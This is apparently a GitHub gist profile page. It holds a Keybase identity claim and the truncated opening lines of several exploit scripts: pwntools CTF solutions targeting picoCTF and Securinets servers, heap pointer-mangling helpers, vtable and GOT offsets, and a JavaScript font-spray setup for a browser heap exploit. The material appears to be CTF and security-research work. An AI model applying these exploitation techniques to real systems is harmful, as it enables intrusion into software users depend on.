I hereby claim:
- I am hkraw on github.
- I am hk_1 (https://keybase.io/hk_1) on keybase.
- I have a public key ASAiWZwBEgYD4haHSMpi69K7qQ3kv_AsA1Em2iSRXOwVGgo
To claim this, I am signing this object:
#include <iostream> | |
#include <pwntools> | |
#include <string> | |
uint64_t vtable_offset = 0x210b60; | |
uint64_t openat_got_offset = 0x210fe8; | |
uint64_t libc_open_offset = 0xf6450; | |
class Ghost { |
<script> | |
var PAGE_SIZE = 16384; | |
var SIZEOF_CSS_FONT_FACE = 0xb8; | |
var HASHMAP_BUCKET = 208; | |
var STRING_OFFSET = 20; | |
var SPRAY_FONTS = 0x1000; | |
var GUESS_FONT = 0x200430000; | |
var NPAGES = 20; | |
var INVALID_POINTER = 0; | |
var HAMMER_FONT_NAME = "font8"; //must take bucket 3 of 8 (counting from zero) |
I hereby claim:
To claim this, I am signing this object:
#!/usr/bin/env python3 | |
from pwn import * | |
from binascii import hexlify, unhexlify | |
context.update(arch='amd64', os='linux') | |
# helpers | |
def store(key, keySize, value, valueSize): | |
io.sendlineafter('option: ','1') | |
io.sendlineafter('key size: ',str(keySize)) |
#!/usr/bin/python3 | |
from pwn import * | |
# Helpers | |
def mangle(addr, value): | |
return (addr >> 12) ^ value | |
def demangle(obfus_ptr): | |
o2 = (obfus_ptr >> 12) ^ obfus_ptr | |
return (o2 >> 24) ^ o2 |
from pwn import * | |
if __name__=="_main__": | |
# io = process('./vuln') | |
io = remote('mercury.picoctf.net', 5654) | |
exe = ELF('./vuln') | |
io.sendlineafter("portfolio","1"); |
from pwn import * | |
from past.builtins import xrange | |
def a(): | |
io.sendlineafter(')\n>','1') | |
def e(idx, data): | |
io.sendlineafter(')\n>','3') | |
io.sendlineafter('Index: ',str(idx)) | |
io.sendafter('Content: ',data) |
from pwn import * | |
import numpy as np | |
from IO_FILE import * | |
if __name__ == '__main__': | |
# io = process('./main2_success') | |
io = remote("bin.q21.ctfsecurinets.com",1340) | |
libc = ELF("./libc.so.6") | |
io.sendafter("Please provide student username: ","AAAAAAAA") |
#!/usr/bin/python3 | |
from pwn import * | |
from past.builtins import xrange | |
from IO_FILE import * | |
from time import sleep | |
###Utils | |
def newins(instrument,data): | |
io.sendlineafter(': ','1') | |
io.sendlineafter('Instrument: ',instrument) |
#!/usr/bin/python3 | |
from pwn import * | |
from past.builtins import xrange | |
from time import sleep | |
import random | |
#Utils | |
def create(type,number): | |
io.sendlineafter('>> ','1') | |
io.sendlineafter('> ',f'{type}') |